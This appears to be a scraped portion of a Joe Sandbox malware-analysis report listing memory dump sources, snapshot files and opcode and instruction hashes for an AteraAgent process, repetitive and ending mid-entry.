                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 472b9ed7b9a15ec0cf97b251610207a006020730f38f3028d598efefc1dfba99
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: ddd0110b247f932cbd924bd1319a45397d61234ca8bc27ea6bbc748fa20aee36
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 472b9ed7b9a15ec0cf97b251610207a006020730f38f3028d598efefc1dfba99
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32A15830B0E68F4FE329976888B55B87BD1EF8A300F1541BAD48BCA2E7DD3D65468341
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6e4a28f58a98df06905dd2f94625fe82adfec8179b2b8d6f7f04ae6a01846d55
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2254206ce983d4fee9f863739464509c7f4a0e0dae99f665360136cf4e49088d
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e4a28f58a98df06905dd2f94625fe82adfec8179b2b8d6f7f04ae6a01846d55
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C914B21B0EA8F4FE755DFAC84656B07B91EF99380B0501F6C459CB2EBDD19BC468390
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3cdf89cc867b78c0e568d33cac028115f8ddd57d87f2427b360d09fe7806110e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 47479629acde35791442ef5a367afe1543bd368029b193a4af3f3741210bcccb
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cdf89cc867b78c0e568d33cac028115f8ddd57d87f2427b360d09fe7806110e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41710052F1FC4E0FF7B596AC187927413C1EFA8695B26017BD4AECB2E1DE18AD060380
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5782ba50924ab3f74f73d5cdc675b7908b833892fc645fb3d9238a8ca022d90e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 13dfc975f191c45ffb5e1515ce5f01ee9c51edc03c9acddf218a3c1aea211df1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5782ba50924ab3f74f73d5cdc675b7908b833892fc645fb3d9238a8ca022d90e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B912432B19B4E4FDB68DE6884A55B6B3E0FF55310B10067DD0AAC71E6EE38F8428740
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: aa354ec09891f03b624742a870244c2a20ef11f58f464d9b52b407c474854223
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 62349dc7e8bcb0228873861f30fc3278abb1416b5cff6c34301564c0623eaf0c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa354ec09891f03b624742a870244c2a20ef11f58f464d9b52b407c474854223
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02A19430A2DF8D8FD7A8EB688054BAAB7E0FF59700F150579D49DC72A2DE34E8858741
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f3d7712ecddd04181a84ed6a9cdf1cfd04131719be682718dfdaca1ed5287f09
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1ced52b6ddf595157aad07361947889b3f7e0839477759572f3c27a7e5b2113f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3d7712ecddd04181a84ed6a9cdf1cfd04131719be682718dfdaca1ed5287f09
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F191873171DB8D4FDB28DF6884A55B5B7E0EF91310F10067ED4AAC71A6DE28F8428741
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 40005cd4f152683859d6947edce87fa5a4fa8a8939648f086174eb28c4840db3
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 748cae594d93cfebe171f5792a8c85a5c9ca56c67d88686b73c58a8790c47023
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40005cd4f152683859d6947edce87fa5a4fa8a8939648f086174eb28c4840db3
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1812231B1EB4D4FE7B89B58946967977D1EF88310F05017EE44DC33A2DE25B9428B82
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8b9791aff1a0ff5c569b58e921e9de9e6a1e3b02de351604aa29bf24d7302739
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e15b6f07ee4029893c519bb80db800928fa090d8213d352184d9f5f11d6a8f8a
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b9791aff1a0ff5c569b58e921e9de9e6a1e3b02de351604aa29bf24d7302739
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3814C61A0EB8A4FEB759BBC48755B43BA0EF56710F0901BBC49DCB2E7DD246942C350
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
Memory Dump Source
• Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 007f30350234eea4f6030ec6b38669c520cb8b4b2beb828b01e0a4c355006e4a
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9759e85d194fa764382aff1ab35d95d505808478b49a86f3ec3016c9f99eb048
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 007f30350234eea4f6030ec6b38669c520cb8b4b2beb828b01e0a4c355006e4a
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5561D63050E6894FE756CB68C864BD57FF1EF4B340F1501EAD088DB2A2CA345D86CB10
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f028a11d13a6af543a516c53034792cf4e00b4ad6fe9c317e138fd810fc21630
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4ca7ba6bcb188422dc9f04f904637edf98ceede852335cc9a3c3981f8a99a8ad
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f028a11d13a6af543a516c53034792cf4e00b4ad6fe9c317e138fd810fc21630
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37518593F0F6C70BE775579868B54F96BA0DF51264B4A01BFD0EC8E0B3DD093A1A8251
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9de6a189272d41aea0f8431b97389e9925d8eb78ca18ac7c38cd3ba4704164ab
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 35e401e272ed07883f2705cc7bcf6f0c54aa7134b10441845fee3dffa90ed448
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9de6a189272d41aea0f8431b97389e9925d8eb78ca18ac7c38cd3ba4704164ab
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1551692071DA4E0FE768D77880656B877E2EF49300F0540FAD44ECB2E7C92E79828350
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 43769e2b3bbf6f7191c814ae4ff67b0ade57e21ca56d9fdb68b837cad95a3efe
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b433bf1292007dad0694b214e23b7142e13a06307b4ef63c27d473d0294f12e7
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43769e2b3bbf6f7191c814ae4ff67b0ade57e21ca56d9fdb68b837cad95a3efe
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1451F73061DA4D8FDFE8EF18C861AB937E2FFAC740B150569E44DC33A1CA24E9418B81
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b4fa0f3760e72ea3a28019cd442cf2cd6ebf96f39d0ea5b48cd2dfb8a2e597e0
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 30237e56f8cbf8b78201763cc957a7b4cdc17a7154d9ff666a6fb841c330590f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4fa0f3760e72ea3a28019cd442cf2cd6ebf96f39d0ea5b48cd2dfb8a2e597e0
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2551D870E0E68D4FEB55DBA888616E97FF0FF46301F0501BAD059DB2E6CA382942C751
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9697178fad853267844468ee6ab80582f8f23e846170fbfb1238aba38205b0d2
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0e2595d9ea7167ce03ead878545d9d1b2de64062433a7421f16dc4d244790ede
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9697178fad853267844468ee6ab80582f8f23e846170fbfb1238aba38205b0d2
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9741F230B1DF4D4FDB68EB5C84265B977E2FB98B10B14427AE449C3269DE20FC028781
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
Memory Dump Source
• Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
Memory Dump Source
• Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: add777cf35ac7818f0b9119473ef29d84b11d5935fe36056ed437c3073baa411
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1c9b5c475a0ef4ae1c2aa480f570a24b85d9fad8d5730dd868efab4c85063ce1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: add777cf35ac7818f0b9119473ef29d84b11d5935fe36056ed437c3073baa411
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27419F30E0AA4D8FEB54DFA8C8656EDBBB1FF59300F05017AD459DB2A6CB386941CB40
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: fae3a2b647f7fa79dcd59f747d4ff463654e023ed8834800bd0983a8733037b3
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a68ec17a9552c85278cf4505bcb53708e03612c7b0eb95811b478f7e55c7aafa
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fae3a2b647f7fa79dcd59f747d4ff463654e023ed8834800bd0983a8733037b3
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10411961B0E7CA4FE759DBA898716E47BA0EF96350F0902F6D098CF1D7DD1438068751
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 422a4ec2e75e2b07c51784a849b608c52478a453960430ffa1735000f713f6b7
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a923148a8c4c2e121063456729b405740927d82996e1e2a55188a2a0f293ad7c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 422a4ec2e75e2b07c51784a849b608c52478a453960430ffa1735000f713f6b7
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3241A03071DE898FEBA9EB2CC0A0E7177E1EF59304B1545B9D09ACB2A6CD24F945C750
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 44345d7f6df6a6832dfbfd0f35bd6bd8dc08aa291f95e7e6aa371eac63542faf
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: dbfcc17a7a1616d19093060e50ed2bba6b897e4e39f2a9fcc665c145fa8ac3bf
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44345d7f6df6a6832dfbfd0f35bd6bd8dc08aa291f95e7e6aa371eac63542faf
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0541A470E0DA8D8FEB51DFA8C451AE9BFF0EF5A310F0401A6D058DB2A6CB34A981C750
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 480fcd713305aad93e3e74e90a0469cae50a7dcfc7e15ff370e8b796dd4fc3c3
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 11388208789f67720b961328d446958bb7a76d02a0b01f5d8900bc15b396eff3
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 480fcd713305aad93e3e74e90a0469cae50a7dcfc7e15ff370e8b796dd4fc3c3
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64411662F2AE0F0BEB78979C90A55F963C2FFAC35070501B9D41EC73A6ED24F9424680
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4ed5d2fc93de01b85476645a47b9f3b2122d3b6b94e5db30a12f778aef495139
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9dff2a5761b2fb010e58bdd5ecb68dea081dc2c2db1dccebff5053799b41420c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ed5d2fc93de01b85476645a47b9f3b2122d3b6b94e5db30a12f778aef495139
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA418130B19A0E4FDBA8DF5884656BA37E1FFA8340F11017AE41ED7295CE34F9068780
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 17bb9219f37292db081f0256af8456d6152dc201e0f761bc1fcd4c847ad3ac7f
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3f459635249e5d0ce89d632b1c01f0144a9f9adf8985f553d8c2fb26ba49ba24
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17bb9219f37292db081f0256af8456d6152dc201e0f761bc1fcd4c847ad3ac7f
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C41D421A1EB890FD766977848796657BF2EF42200B0A40FBD099CF1E7DE187D0AC751
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 62bee299b327b851c2c0aa15109ad56e49e72abb949451766bcba8699f974616
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: cb4446ae6ef610a07539961760da97560bbd58620298c9c5c60c71114f4ff6c9
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62bee299b327b851c2c0aa15109ad56e49e72abb949451766bcba8699f974616
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51312831B1DA494FF7A0C5589494A76B7D2EFA8324F09067EE45CC72B1DA15FA80C386
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 12369fb2cb73f5172de62e956a8f35f1243e1fc73aac795702e0c8ce93c80ca4
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6da18af7aa9e6221e9c552489085a5b48ebd4035a9f5bc15ffa22305a00112a1
